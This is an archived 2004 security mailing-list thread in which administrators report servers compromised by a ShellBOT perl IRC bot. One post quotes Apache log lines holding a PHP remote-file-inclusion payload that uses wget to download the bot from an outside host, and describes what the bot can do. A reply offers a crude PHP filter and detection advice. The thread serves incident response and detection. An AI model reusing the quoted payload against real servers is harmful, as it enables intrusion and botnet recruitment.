Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Systems compromised with ShellBOT perl script

from [nathan c. dickerson] Network Security [Permanent Link]
Subject: Re: Systems compromised with ShellBOT perl script
Date: Fri, 03 Sep 2004 16:32:03 -0700
I've seen this alot, actually the exist same exploit was used on a server here. The attackers were from Brazil as well.
I tracked down some of these guys to home dsl lines, and most recently to a home dsl line in here in Canada.. it's just really annoying..
I've seen these fools download files from domain names registered under their real names.. and its always fun to give them a call..
If they get in, they'll just mass deface your server.
They launched a fairly large dos against me when I confronted them on irc..
Check out modsecurity.org, it'll prevent such garbage.. I also wrote some snort rules to detect this.
I beleive they have written some automated tools to inject index.php pages with

id=http:// and page=http:// injections

simple fix if it worked -- just replace with $id..

if(!$PAGE){
$PAGE = "default";
}
else {
$ret = strstr($PAGE, "://");
if($ret == true) {
echo "you little bastards. im coming for you.<br>";
$message = print_r($_SERVER, true);
mail("your@email.addr", "Exploit attempt", $message);
exit();
} }

nathand

Kirby Angell wrote:

Yesterday we noticed a funny looking Apache log entry.  It contained:

http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2

in the Referer entry.  The actual HTTP request was inocuous, but the
Referer entry is not.  I have been in contact with the owner of the
computer that was the apparent target of the attack and he reports that
the "index.php" page properly sanitizes its variables to keep this from
working.

The attack attempts to trick the server into downloading and running the
given perl script, ".egg2" in this case.  I retrieved a copy of that
script and found it configured to log into an IRC server
(irc.mzima.net:6667).  Once the script is logged in, it joins the
channel "#datalink" and then waits for private messages from its
handler.  The script can perform limited portscans, denial of service
attacks, and can run shell commands as whatever user the compromised web
server was running as.  The script hides its identity by changing it
process name to "[httpd]" so it looks like one of many server threads.

I logged into the IRC server and joined the channel to find 62
compromised systems listening.  Unfortunately I was noticed and now the
channel is by invitation only.  I have notified as many of the
administrators for those systems as could be identified from whois
records.  I have also notified the operators of the IRC server.

The IP address of the system that set off the original inquiry is
63.227.76.25.  The admin of one of the compromised boxes has found that
same IP address involved in their attack too.  The Apache log entries
from their system look like this:

63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0"
200 195
"http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2";
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
Firefox/0.9.1"
63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET
/images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711
"http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2";
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
Firefox/0.9.1"
63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif
HTTP/1.0" 200 2576
"http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2";
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626
Firefox/0.9.1"

I would like to find if he used other IPs, but so far I've only had a
few responses from admins of the compromised systems.  All who responded
were happy to provide log entries though.

This sort of script shouldn't be terribly difficult to spot.  A "netstat
~ -pan | grep 6667" will show its presence while running.  Unless some
other compromise is used in conjunction with the script, the cracker
will not be able to install any sort of rootkit to hide the script's
presence.

--
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0


[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: Uptick in telnetd scanners - possible worm activity., Jonathan Upperman
Next by Date:  Systems compromised with ShellBOT perl script - part 2, Kirby Angell
Previous by Thread:  Systems compromised with ShellBOT perl script, Kirby Angell
Next by Thread:  Systems compromised with ShellBOT perl script - part 2, Kirby Angell
Indexes:  [Date] [Thread] [Top] [All Lists]